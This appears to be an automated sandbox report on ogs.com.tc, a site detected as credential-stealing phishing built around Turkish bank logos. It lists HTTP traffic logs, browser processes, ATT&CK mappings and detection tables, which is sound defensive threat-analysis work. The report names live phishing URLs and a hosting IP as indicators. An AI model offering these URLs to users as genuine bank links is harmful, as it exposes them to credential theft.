Source: global traffic	HTTP traffic detected: GET /assets/images/banks/garanti.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/halk.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ptt.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ykb.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/vakif.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/odea.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/hsbc.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/isbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/favicon-196x196.png HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/1.png HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/finans.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/fiba.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/halk.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/garanti.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/favicon-196x196.png HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.ogs.com.tc
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_77.2.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: chromecache_77.2.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqW106F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWt06F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtk6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWu06F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuU6F.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuk6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWxU6F15M.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
Source: chromecache_89.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufA5qW54A.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufB5qW54A.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufC5qW54A.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufD5qW54A.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufJ5qW54A.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufN5qU.woff2)
Source: chromecache_114.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufO5qW54A.woff2)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: classification engine

Classification label: mal72.win@16/86@8/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2208,i,2536867606534393903,12110685460829100041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.ogs.com.tc/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2208,i,2536867606534393903,12110685460829100041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://www.ogs.com.tc/	12%	Virustotal		Browse
https://www.ogs.com.tc/	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
www.ogs.com.tc	7%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
ogs.com.tc	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.ogs.com.tc/assets/images/banks/finans.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/ptt.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/alternatif.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/ziraat.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/deniz.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/vakif.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/sekerbank.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/akbank.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/turkiyefinans.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/hsbc.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/halk.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/teb.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/edkkds.svg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/ykb.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/isbank.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/garanti.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/kuveyt.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/albaraka.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/1.png	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/favicon-196x196.png	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/anadolu.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/css/style.css	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/odea.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/js/script.js	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/fiba.jpg	100%	Avira URL Cloud	phishing
https://www.ogs.com.tc/assets/images/banks/ing.jpg	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
www.google.com	142.250.185.228	true	false	0%, Virustotal, Browse	unknown
ogs.com.tc	185.216.70.93	true	false	9%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
www.ogs.com.tc	unknown	unknown	false	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.ogs.com.tc/assets/images/banks/ptt.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/finans.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/alternatif.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/ziraat.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/deniz.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/vakif.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/	true		unknown
https://www.ogs.com.tc/assets/images/banks/sekerbank.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/akbank.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/turkiyefinans.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/hsbc.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/halk.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/banks/teb.jpg	false	Avira URL Cloud: phishing	unknown
https://www.ogs.com.tc/assets/images/edkkds.svg	false	Avira URL Cloud: phishing	unknown
